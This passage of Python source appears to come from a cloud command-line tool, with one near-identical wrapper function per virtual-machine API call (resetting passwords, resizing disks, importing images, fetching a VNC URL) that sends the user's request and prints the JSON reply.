reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyInstancesVpcAttributeRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyInstancesVpcAttribute(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doInquiryPriceResetInstance(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("InquiryPriceResetInstance", g_param[OptionsDefine.Version])
return
param = {
"InstanceId": argv.get("--InstanceId"),
"ImageId": argv.get("--ImageId"),
"SystemDisk": Utils.try_to_json(argv, "--SystemDisk"),
"LoginSettings": Utils.try_to_json(argv, "--LoginSettings"),
"EnhancedService": Utils.try_to_json(argv, "--EnhancedService"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.InquiryPriceResetInstanceRequest()
model.from_json_string(json.dumps(param))
rsp = client.InquiryPriceResetInstance(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeDisasterRecoverGroupQuota(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeDisasterRecoverGroupQuota", g_param[OptionsDefine.Version])
return
param = {
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeDisasterRecoverGroupQuotaRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeDisasterRecoverGroupQuota(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doResetInstancesPassword(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ResetInstancesPassword", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"Password": argv.get("--Password"),
"UserName": argv.get("--UserName"),
"ForceStop": Utils.try_to_json(argv, "--ForceStop"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ResetInstancesPasswordRequest()
model.from_json_string(json.dumps(param))
rsp = client.ResetInstancesPassword(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doPurchaseReservedInstancesOffering(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("PurchaseReservedInstancesOffering", g_param[OptionsDefine.Version])
return
param = {
"InstanceCount": Utils.try_to_json(argv, "--InstanceCount"),
"ReservedInstancesOfferingId": argv.get("--ReservedInstancesOfferingId"),
"DryRun": Utils.try_to_json(argv, "--DryRun"),
"ClientToken": argv.get("--ClientToken"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.PurchaseReservedInstancesOfferingRequest()
model.from_json_string(json.dumps(param))
rsp = client.PurchaseReservedInstancesOffering(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doResizeInstanceDisks(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ResizeInstanceDisks", g_param[OptionsDefine.Version])
return
param = {
"InstanceId": argv.get("--InstanceId"),
"DataDisks": Utils.try_to_json(argv, "--DataDisks"),
"ForceStop": Utils.try_to_json(argv, "--ForceStop"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ResizeInstanceDisksRequest()
model.from_json_string(json.dumps(param))
rsp = client.ResizeInstanceDisks(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeReservedInstances(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeReservedInstances", g_param[OptionsDefine.Version])
return
param = {
"DryRun": Utils.try_to_json(argv, "--DryRun"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
"Filters": Utils.try_to_json(argv, "--Filters"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeReservedInstancesRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeReservedInstances(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeZones(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeZones", g_param[OptionsDefine.Version])
return
param = {
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeZonesRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeZones(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateImage(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("CreateImage", g_param[OptionsDefine.Version])
return
param = {
"ImageName": argv.get("--ImageName"),
"InstanceId": argv.get("--InstanceId"),
"ImageDescription": argv.get("--ImageDescription"),
"ForcePoweroff": argv.get("--ForcePoweroff"),
"Sysprep": argv.get("--Sysprep"),
"DataDiskIds": Utils.try_to_json(argv, "--DataDiskIds"),
"SnapshotIds": Utils.try_to_json(argv, "--SnapshotIds"),
"DryRun": Utils.try_to_json(argv, "--DryRun"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateImageRequest()
model.from_json_string(json.dumps(param))
rsp = client.CreateImage(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAssociateSecurityGroups(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("AssociateSecurityGroups", g_param[OptionsDefine.Version])
return
param = {
"SecurityGroupIds": Utils.try_to_json(argv, "--SecurityGroupIds"),
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.AssociateSecurityGroupsRequest()
model.from_json_string(json.dumps(param))
rsp = client.AssociateSecurityGroups(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doResetInstancesType(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ResetInstancesType", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"InstanceType": argv.get("--InstanceType"),
"ForceStop": Utils.try_to_json(argv, "--ForceStop"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ResetInstancesTypeRequest()
model.from_json_string(json.dumps(param))
rsp = client.ResetInstancesType(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyImageAttribute(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyImageAttribute", g_param[OptionsDefine.Version])
return
param = {
"ImageId": argv.get("--ImageId"),
"ImageName": argv.get("--ImageName"),
"ImageDescription": argv.get("--ImageDescription"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyImageAttributeRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyImageAttribute(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeInstancesOperationLimit(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeInstancesOperationLimit", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"Operation": argv.get("--Operation"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeInstancesOperationLimitRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeInstancesOperationLimit(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doInquiryPriceResetInstancesType(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("InquiryPriceResetInstancesType", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"InstanceType": argv.get("--InstanceType"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.InquiryPriceResetInstancesTypeRequest()
model.from_json_string(json.dumps(param))
rsp = client.InquiryPriceResetInstancesType(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeInstanceFamilyConfigs(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeInstanceFamilyConfigs", g_param[OptionsDefine.Version])
return
param = {
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeInstanceFamilyConfigsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeInstanceFamilyConfigs(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteDisasterRecoverGroups(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DeleteDisasterRecoverGroups", g_param[OptionsDefine.Version])
return
param = {
"DisasterRecoverGroupIds": Utils.try_to_json(argv, "--DisasterRecoverGroupIds"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteDisasterRecoverGroupsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DeleteDisasterRecoverGroups(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeImportImageOs(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeImportImageOs", g_param[OptionsDefine.Version])
return
param = {
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeImportImageOsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeImportImageOs(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doResetInstancesInternetMaxBandwidth(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ResetInstancesInternetMaxBandwidth", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"InternetAccessible": Utils.try_to_json(argv, "--InternetAccessible"),
"StartTime": argv.get("--StartTime"),
"EndTime": argv.get("--EndTime"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ResetInstancesInternetMaxBandwidthRequest()
model.from_json_string(json.dumps(param))
rsp = client.ResetInstancesInternetMaxBandwidth(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doResetInstance(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ResetInstance", g_param[OptionsDefine.Version])
return
param = {
"InstanceId": argv.get("--InstanceId"),
"ImageId": argv.get("--ImageId"),
"SystemDisk": Utils.try_to_json(argv, "--SystemDisk"),
"LoginSettings": Utils.try_to_json(argv, "--LoginSettings"),
"EnhancedService": Utils.try_to_json(argv, "--EnhancedService"),
"HostName": argv.get("--HostName"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ResetInstanceRequest()
model.from_json_string(json.dumps(param))
rsp = client.ResetInstance(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSyncImages(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("SyncImages", g_param[OptionsDefine.Version])
return
param = {
"ImageIds": Utils.try_to_json(argv, "--ImageIds"),
"DestinationRegions": Utils.try_to_json(argv, "--DestinationRegions"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SyncImagesRequest()
model.from_json_string(json.dumps(param))
rsp = client.SyncImages(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyKeyPairAttribute(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyKeyPairAttribute", g_param[OptionsDefine.Version])
return
param = {
"KeyId": argv.get("--KeyId"),
"KeyName": argv.get("--KeyName"),
"Description": argv.get("--Description"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyKeyPairAttributeRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyKeyPairAttribute(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doImportImage(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ImportImage", g_param[OptionsDefine.Version])
return
param = {
"Architecture": argv.get("--Architecture"),
"OsType": argv.get("--OsType"),
"OsVersion": argv.get("--OsVersion"),
"ImageUrl": argv.get("--ImageUrl"),
"ImageName": argv.get("--ImageName"),
"ImageDescription": argv.get("--ImageDescription"),
"DryRun": Utils.try_to_json(argv, "--DryRun"),
"Force": Utils.try_to_json(argv, "--Force"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ImportImageRequest()
model.from_json_string(json.dumps(param))
rsp = client.ImportImage(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyDisasterRecoverGroupAttribute(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyDisasterRecoverGroupAttribute", g_param[OptionsDefine.Version])
return
param = {
"DisasterRecoverGroupId": argv.get("--DisasterRecoverGroupId"),
"Name": argv.get("--Name"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyDisasterRecoverGroupAttributeRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyDisasterRecoverGroupAttribute(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeInstanceVncUrl(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeInstanceVncUrl", g_param[OptionsDefine.Version])
return
param = {
"InstanceId": argv.get("--InstanceId"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeInstanceVncUrlRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeInstanceVncUrl(model)
